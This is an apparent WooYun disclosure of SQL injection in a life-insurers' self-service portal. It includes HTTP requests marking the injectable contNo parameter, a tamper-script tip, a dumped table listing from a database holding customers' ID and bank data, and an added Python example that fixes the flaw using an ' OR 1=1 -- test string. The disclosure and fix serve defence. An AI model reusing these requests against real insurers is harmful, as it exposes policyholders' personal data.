WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-11-04: Details reported to the vendor; awaiting vendor handling
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol)
2015-12-31: Details disclosed to core white hats and domain experts
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public
A quick check shows this affects many large life insurance companies, including Guohua Life (国华人寿), Zhujiang Life (珠江人寿), Junkang Life (君康人寿), Guolian Life (国联人寿) and Zhonghan Life (中韩人寿), several of which are vendors already registered on the platform.
Vulnerable location: /eservice/cont/cont.do. Injected parameter: contNo. Note: before the vulnerability can be used, an ordinary member account has to be registered; that step is simple and not described further. Some of the affected cases:
Guohua Life: **.**.**.**/eservice/account/register.action?action=initSingle
Zhujiang Life: **.**.**.**/eservice/account/register.action?action=initSingle
Junkang Life: **.**.**.**/eservice/account/register.action?action=initSingle
Guolian Life: **.**.**.**/eservice/eservice/account/register.action ?action=initSingle
Zhonghan Life: **.**.**.**/eservice/account/login.action ?action=initSingle
Zhujiang Life is used as the example here. PS: for testing, the between.py script can be used. After registering, in the personal self-service management system:
POST /eservice/cont/cont.do?action=querylinkedconts&ajax=true HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 122
Accept: application/xml, text/xml, */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/eservice/user/customer.do?action=home&username=weaver
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=Pjp7W5xhc77gwGyh4HFTpnyTYnKDyQvKN1yLsRhtbkvgTLMtBrTG!-1026876428; __ghuid=51889761446607646641; prlife_point=A003e5fe40f2c1ab5b2b930f8e512761425ePjp7W5xhc77gwGyh4HFTpnyTYnKDyQvKN1yLsRhtbkvgTLMtBrTG!-1026876428!1446605242058; SERVERID=13d463a0bc3357450015f86147f4c89d|1446608135|1446605242

contNo=dsad&coreStatus=02&startValidateDate=&endValidateDate=&_search=false&nd=1446607822114&rows=10&page=1&sidx=&sord=asc
A large amount of data:
Database: ESERVICE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| BAK_T_ACCOUNT_VALUE_D_0819     | 5209544 |
| EBIZ_THIRD_TRADE               | 4166435 |
| EBIZ_OPER_HIS                  | 3833769 |
| EBIZ_STATISTICS_HIS            | 2822990 |
| EBIZ_BUSINESS_TRADE            | 1651374 |
| EBIZ_STATISTICS_VISITOR        |  827275 |
| EBIZ_APPNT                     |  724885 |
| EBIZ_INSURED                   |  724885 |
| EBIZ_ORDER                     |  724885 |
| EBIZ_ORDER_INSURANCE           |  724884 |
| EBIZ_THIRD_ORDER               |  716996 |
| EBIZ_ORDER_ACCOUNT             |  613288 |
| ES_CUSTOMERCONT                |  612623 |
| EBIZ_IMPART                    |  594505 |
| EBIZ_ELEC_CONT                 |  486094 |
| EBIZ_SMS_WAITQUEUE             |  437507 |
| EBIZ_POINT_ACTION              |  432670 |
| EBIZ_ORDER_REVISIT_DETAIL      |  364710 |
| EBIZ_CORE_ESERVICE_IMPORT      |  314547 |
| EBIZ_THIRD_NOTIFY              |  177469 |
| EBIZ_ORDER_SURRENDER           |  176693 |
| EBIZ_THIRD_SURRENDER           |  175237 |
| BAK_T_ACCOUNT_VALUE_D_SNP_0819 |  135356 |
| EBIZ_PUBLIC_USER               |   77550 |
| EBIZ_ORDER_REVISIT             |   72942 |
| EBIZ_PUBLIC_MSG_EXCHANGE       |   71660 |
| EBIZ_IMPART_ITEM               |   37378 |
| EBIZ_THIRD_REFUND_PAYMENT      |   31253 |
| EBIZ_LOGIN_CHECK               |   17891 |
| EBIZ_PAYMENT                   |    6066 |
| EBIZ_PUBLIC_MESSAGE            |    5666 |
| EBIZ_THIRD_FILE                |    2948 |
| EBIZ_ACCOUNT_AUTH              |    2748 |
| EBIZ_PRODUCT_PROPERTY          |    2363 |
| EBIZ_MESSAGE_EXCHANGE          |    1353 |
| EBIZ_CODE                      |    1279 |
| EBIZ_RECOMMEND_REWARD          |     790 |
| EBIZ_PRODUCT_CHECKRULE         |     577 |
| EBIZ_RECOMMENDED               |     543 |
| EBIZ_APPOINTMENT_DETAIL        |     303 |
| EBIZ_APPOINTMENT_INFO          |     213 |
| EBIZ_POINT_HISTORY             |     109 |
| EBIZ_GROUP_BILLNO              |     100 |
| EBIZ_ORDER_TYPE_PROPERTY       |      87 |
| EBIZ_COMPLAIN_SUGGEST          |      70 |
| EBIZ_PRODUCT                   |      66 |
| EBIZ_MESSAGE_TEMPLATE          |      56 |
| EBIZ_BATCH_INFO                |      47 |
| EBIZ_ENSURE_LIABILITY          |      32 |
| EBIZ_CLAIM_REPORT              |      26 |
| EBIZ_JD_REFUND                 |      22 |
| EBIZ_CORE_SURRENDER            |      21 |
| EBIZ_JKB_PAY_ORDER             |      17 |
| EBIZ_PRODUCT_ENSURE            |      16 |
| EBIZ_JKB_ACCOUNT               |      15 |
| EBIZ_PUBLIC_MENU               |      14 |
| EBIZ_PUBLIC_RECEIVE_CONFIG     |      14 |
| EBIZ_RECOMMEND_PROMOTER        |      13 |
| EBIZ_JKB_ORDER_CLAIM           |      12 |
| EBIZ_JKB_REFUND                |      11 |
| EBIZ_HOLIDAY_MONTH_COUNT       |       4 |
| EBIZ_RECOMMEND_REWARD_RULE     |       4 |
| EBIZ_JKB_PLATFORM              |       1 |
| EBIZ_PUBLIC_PLATFORM           |       1 |
| EBIZ_SMS_TIME                  |       1 |
+--------------------------------+---------+
Partial view:
This table with roughly 310,000 rows contains ID card numbers, policy numbers, bank account numbers, names, e-mail addresses, phone numbers and so on. Partial view:
And so on. Another example, again Zhujiang Life:
POST /eservice/cont/cont.do?action=querylinkedconts&ajax=true HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 126
Accept: application/xml, text/xml, */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/eservice/user/customer.do?action=home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=D69B254B36E1FDF3FBAEB75A3A4118DF; CNZZDATA1000419874=440329166-1445182109-null%7C1446605556; SERVERID=05abcb5b9ada6799e76378780182f867|1446606282|1446605536

customerId=116410&contNo=aasd&startValidateDate=&endValidateDate=&_search=false&nd=1446606010538&rows=10&page=1&sidx=&sord=asc
And so on; the other sites are the same as above.
As described above.
Fix: parameter filtering.
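The "parameter filtering" fix, shown as an added example that is not code from the report or from any of the insurers named in it. The affected system appears to be a Java web application (inferred from its .do/.action URLs), but the example is written in Python against an in-memory SQLite database so it runs stand-alone; the ES_CUSTOMERCONT table layout, its column names, the sample rows, the customer id and the assumed contNo format are all constructed for the example. It places the injectable "before" lookup next to the hardened "after" lookup, which validates contNo against a whitelist and then binds it as a query parameter:

```python
"""Added example; not code from the WooYun report or from any affected insurer.

Models the 'parameter filtering' fix for the contNo injection in an
/eservice/cont/cont.do-style policy lookup.  An in-memory SQLite database
stands in for the real ESERVICE database; table layout, column names,
sample rows and the contNo format are constructed for the example.
"""
import re
import sqlite3

# Constructed sample data: three policies belonging to two customers.
SAMPLE_ROWS = [
    ("P2015000001", 116410, "02"),
    ("P2015000002", 116410, "01"),
    ("P2015000003", 200001, "02"),
]

# Assumed policy-number format: 1-20 letters or digits.  Quotes, spaces and
# the LIKE wildcards % and _ are all rejected, so a caller cannot widen the
# search beyond a prefix match.  Replace with the insurer's real scheme.
CONT_NO_RE = re.compile(r"^[A-Za-z0-9]{1,20}$")


def open_sample_db() -> sqlite3.Connection:
    """Build the stand-in ES_CUSTOMERCONT table (the name is borrowed from
    the sqlmap listing in the report; its real columns are unknown)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ES_CUSTOMERCONT "
        "(CONT_NO TEXT, CUSTOMER_ID INTEGER, CORE_STATUS TEXT)"
    )
    conn.executemany("INSERT INTO ES_CUSTOMERCONT VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_linked_conts_vulnerable(conn, customer_id, cont_no):
    """'Before': the request parameter is spliced into the SQL text, so the
    value of contNo can alter the statement itself.  This is the defect
    class the report describes; kept only for contrast with the fix."""
    sql = (
        "SELECT CONT_NO FROM ES_CUSTOMERCONT WHERE CUSTOMER_ID = %d "
        "AND CONT_NO LIKE '%s%%'" % (customer_id, cont_no)
    )
    return [row[0] for row in conn.execute(sql)]


def bound_query(conn, customer_id, cont_no):
    """Parameter binding: the driver sends contNo as data, never as SQL."""
    sql = (
        "SELECT CONT_NO FROM ES_CUSTOMERCONT "
        "WHERE CUSTOMER_ID = ? AND CONT_NO LIKE ?"
    )
    return [row[0] for row in conn.execute(sql, (customer_id, cont_no + "%"))]


def query_linked_conts_fixed(conn, customer_id, cont_no):
    """'After': whitelist the format first (input filtering), then run the
    bound query, scoped to the customer id taken from the logged-in session."""
    if not CONT_NO_RE.match(cont_no):
        raise ValueError("contNo has an invalid format")
    return bound_query(conn, customer_id, cont_no)


def demo():
    """Run both lookups on a benign and on a quote-bearing contNo value."""
    conn = open_sample_db()
    benign = "P2015"
    hostile = "' OR 1=1 --"
    results = {
        "vulnerable_benign": query_linked_conts_vulnerable(conn, 116410, benign),
        "vulnerable_hostile": query_linked_conts_vulnerable(conn, 116410, hostile),
        "bound_hostile": bound_query(conn, 116410, hostile),
    }
    try:
        query_linked_conts_fixed(conn, 116410, hostile)
        results["fixed_hostile"] = "accepted"
    except ValueError:
        results["fixed_hostile"] = "rejected"
    results["fixed_benign"] = query_linked_conts_fixed(conn, 116410, benign)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running demo() shows the difference: the concatenated lookup returns every row in the table for the quote-bearing value, while the bound lookup treats the same string as a literal policy-number prefix and returns nothing, and the whitelist rejects it before any query runs. The two layers are deliberate: binding is what actually removes the injection, and the format whitelist is defence in depth that also keeps LIKE wildcards out of user input. The customer id is passed in by the caller so that the handler can take it from the authenticated session rather than from a request field.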
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-06 15:20
CNVD has confirmed and reproduced the reported issue and has forwarded it through CNCERT to the insurance industry's informatization authority, which will coordinate remediation with the operators of the affected sites.
None yet